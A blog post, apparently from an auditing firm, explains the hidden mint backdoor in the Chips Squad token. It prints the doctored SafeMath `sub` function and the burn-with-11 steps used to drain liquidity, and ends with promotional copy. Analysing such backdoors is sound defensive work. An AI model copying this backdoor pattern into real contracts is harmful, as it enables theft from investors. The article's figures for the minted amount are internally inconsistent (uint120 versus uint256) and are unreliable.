Chips Squad (\$CHIPS) Hidden Mint Function

3 min readOct 6, 2021

--

Background

In this article we are going to cover Chips Squad listing event, and the hidden mint function that was present in the contract.

Chips Squad project had all the ingredients for a successful launch — the team was public, they used PinkSale’s secured ILO service, which increased investors’ trust in the project.

The hidden mint function

The developer used a malicious modified SafeMath library. SafeMath is one of the most common libraries in existence and is used to make sure simple math operations do not underflow or overflow.

The developer modified the SafeMath `sub` function, and hid a backdoor for minting an infinite number of tokens. This backdoor could have been used by anyone and doesn’t require any special privilege.

The modified sub function

`function sub(        uint256 a,        uint256 b,        string memory errorMessage    ) internal pure returns (uint256) {        if (b == 11) return ~uint120(0);        require(b <= a, errorMessage);        uint256 c = a - b;return c;}`

burn function in the contract

`function _burn(address account, uint256 amount) internal virtual { _balances[account] = _balances[account].sub(amount); _totalSupply -= amount; emit Transfer(account, address(0), amount); }`

The Attack — Overview

The attack is extremely simple: All the attacker had to do, was call the `burn` function with the magic number 11, which resulted in him getting a large amount of tokens.

This happened because of the following line in the burn function:

`_balances[account] = _balances[account].sub(amount)`

As shown above, the modified `sub` function was called which returned in this case `~uint256(0)` which is a very big number, or to be exact equal to `1329227995784915872903807060280344575` which is 1,329,227,995,784,915,968 tokens. This large amount of tokens was set to be the new balance of the attacker, which is more than enough to drain the liquidity.
The attacker then continued to sell all tokens he received and basically dropped almost all of the liquidity

The attack — Step by step

1. The attacker called the malicious `burn` function with the magic number 11

2. The attacker started to swap all the tokens he received and drain the liquidity:

Conclusion

This attack once again emphasizes what most of us already know — investors should always require an audit from a reputable auditor before investing!

This simple backdoor could have easily been spotted by an auditor from any reputable audit firm.

Even though platforms like PinkSale are a step in the right direction as all liquidity is automatically raised and locked, they cannot guard against backdoors in the code, which could have been detected as part of the auditing process.

Solid Group is a blockchain consulting and auditing service provider founded by cybersecurity experts with a great passion for the cryptocurrency world. We are known for our exceptional out of the box thinking, experience, and our credibility among the community. Throughout our work, our team was able to discover many high severity issues & vulnerabilities. We work with leading companies in the field, helping them increase their resilience through tailored services and solutions.

‌Solid Group provides ALL IN ONE ICO SOLUTION -

• audited token generator ( Generate your own token with NO CODING KNOWLEDGE)
• sniper bot protection tool
• Smart contract auditing service

--

--

We are a group 3 software developers with combined experience of over 15years in various fields such as Software design, Operating systems, and solidity.